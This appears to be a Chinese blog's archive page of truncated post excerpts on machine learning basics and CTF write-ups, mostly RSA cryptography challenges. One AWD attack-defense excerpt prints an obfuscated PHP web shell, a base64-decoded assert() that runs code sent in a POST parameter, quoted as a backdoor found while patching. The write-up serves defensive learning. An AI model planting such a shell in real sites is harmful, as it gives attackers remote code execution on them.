本文的CSDN 感知机原理参考博客: 【机器学习】感知机原理详解 感知机模型:f(x)=sign(w*x+b) sign是符号函数 感知机模型的其中一个超平面是:w*x+b=0 w是超平面的法向量,b是超平面的截距 这个超平面把样本分为正负两类(结合sign()函数) 主要思路: 1.输入训练数据集: 编号 宽度 长度 检验类别 1 3 3 正品 2 4 3 正品 3 1 1 次品 将正负样本区分开 x = np.array([[3,3],[4,3],[1,1]],dtype=np.float64) y = np.…

2020年11月13日 0条评论 33点热度 10人点赞 阅读全文

本文的CSDN 写在前面的: 学习了大半学期的机器学习,通过这一次线性回归的学习过程,理一理思路,进行一个小总结,主要思路是先梳理一下老师给的两份代码,然后再进行梯度下降的实现。 线性回归 线性回归是一种x和y之间的关系为线性关系的回归分析。 实现线性回归的步骤: 1. 提取特征和标签 2. 建立训练数据和测试数据 3. 使用训练数据训练模型 方法一:使用sklearn包装 参考老师给的代码 testLinearRegAndTrainTest.py 1.建立有序的二维数据结构 #第一个参数为特征,第二个参数为标签 …

2020年11月12日 0条评论 27点热度 2人点赞 阅读全文

原理: 0.基本数学公式 a = kb + p a mod b =p 1.RSA的基本公式 c \equiv m^emodn m\equiv c^dmodn \phi(n)=(p-1)\times(q-1) d\times e \equiv1mod\phi (n) 2.dp是什么 dp\equiv d mod(p-1) 3.推导过程 4.求p 遍历X(65537种可能),求出(p-1),得到p且能被n整除;接下来就是常规RSA的解法 for i in range(1,65538): if (dp*e-1)%i ==…

2020年10月23日 2条评论 122点热度 2人点赞 阅读全文

解决Python3 ModuleNotFoundError: No module named 'Cryptodome' pip install pycryptodomex

2020年10月20日 0条评论 22点热度 0人点赞 阅读全文

可爱小小桃的CSDN math [一血] 题目: from Crypto.Util.number import * from hashlib import md5 flag = "XXX" assert len(flag) == 14 pad = bytes_to_long(md5(flag).digest()) hack = 0 for char in flag: hack+= pad hack*= ord(char) print hack #hack = 6436448535706043484886570840…

2020年10月18日 0条评论 25点热度 0人点赞 阅读全文

The Numbers Description:The numbers... what do they mean? Hints:The flag is in the format PICOCTF{} a-1 b-2 c-3 d-4 e-5 f-6 g-7 h-8 i-9 j-10 k-11 l-12 m-13 n-14 o-15 p-16 q-17 r-18 s-19 t-20 u-21 v-22 w-23 x-24 y-25 z-26 大括号前数字对应的字母是PICOCTF GET FLAG! PICOCTF{T…

2020年10月17日 0条评论 30点热度 0人点赞 阅读全文

可爱桃子的CSDN 题目名称:BrokenSystems 题目内容:Successfully modified the encryption module of the encryption system, and then it's up to you. from Crypto.PublicKey import RSA from Crypto.Cipher import PKCS1_OAEP from secret import flag import os rsa = RSA.generate(2048) pu…

2020年10月15日 0条评论 37点热度 2人点赞 阅读全文

BEGIN ssh -p 2201 ctf@118.89.227.105 备份文件以后,首先D盾扫一波 使用defence上waf 开始修洞 .config_common.php 这是一个已知后门 <?php error_reporting(0);set_time_limit(0);a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");a(@${"_P"."O"."S"."T"}[520]); ?> base64_decode:YXNzZXJ0 解密后:ass…

2020年10月10日 0条评论 35点热度 0人点赞 阅读全文

tryrsa CSDN:https://blog.csdn.net/weixin_45369385/article/details/108876212 题目: from secret import e1,e2,flag from Crypto.Util.number import * msg = bytes_to_long("=========Hint:e1="+str(e1)+"=============") p = getPrime(512) q = getPrime(512) N = p*q print N …

2020年09月30日 3条评论 42点热度 0人点赞 阅读全文

写在前面的: RSA在比赛中特别常见,不熟悉原理的话可以看看这两篇文章 RSA加密算法详细解说 RSA的自我介绍(1) 1.RSA 题目: 在一次RSA密钥对生成中,假设p=473398607161,q=4511491,e=17 求解出d作为flga提交 方法一:使用RSA-Tool得到d 方法二: // import gmpy2 e = 17 p = 473398607161 q = 4511491 phi = (p-1)*(q-1) d = gmpy2.invert(e,phi) print(d) // fro…

2020年09月28日 0条评论 17点热度 0人点赞 阅读全文